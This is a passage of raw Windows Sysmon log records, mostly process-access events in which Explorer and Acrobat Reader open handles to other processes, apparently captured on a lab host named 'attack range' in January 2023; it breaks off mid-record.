12:30:28.511{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.511{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.511{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.511{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.511{FE4C2B44-E64A-63C7-8706-00000000AF02}14005968C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\wow64.dll+244af|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f2cc(wow64)|C:\Windows\System32\RPCRT4.dll+64db0(wow64)|C:\Windows\System32\RPCRT4.dll+663cf(wow64)|C:\Windows\System32\combase.dll+9f27e(wow64)|C:\Windows\System32\combase.dll+71e92(wow64)|C:\Windows\System32\combase.dll+728a1(wow64)|C:\Windows\System32\combase.dll+729c0(wow64)|C:\Windows\System32\combase.dll+bfab2(wow64)|C:\Windows\System32\combase.dll+bf5b1(wow64)|C:\Windows\System32\combase.dll+a35a1(wow64)|C:\Windows\System32\combase.dll+101ced(wow64)|C:\Windows\System32\combase.dll+a0668(wow64)|C:\Windows\System32\combase.dll+a17d2(wow64)|C:\Windows\System32\combase.dll+1fda3(wow64)|C:\Windows\System32\RPCRT4.dll+5afd(wow64)|C:\Windows\System32\combase.dll+230a9(wow64) 23542300x800000000000000047642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.511{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21A9B0191E25CF71CA493B0A61619236,SHA256=C5CD2C6E95AAC2C4775D8569F7D16B3AA7E19E6A90100B1831397819BD5A53F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.480{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.480{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.433{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.433{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.386{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.386{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.292{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.292{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.246{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.246{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.199{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.199{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 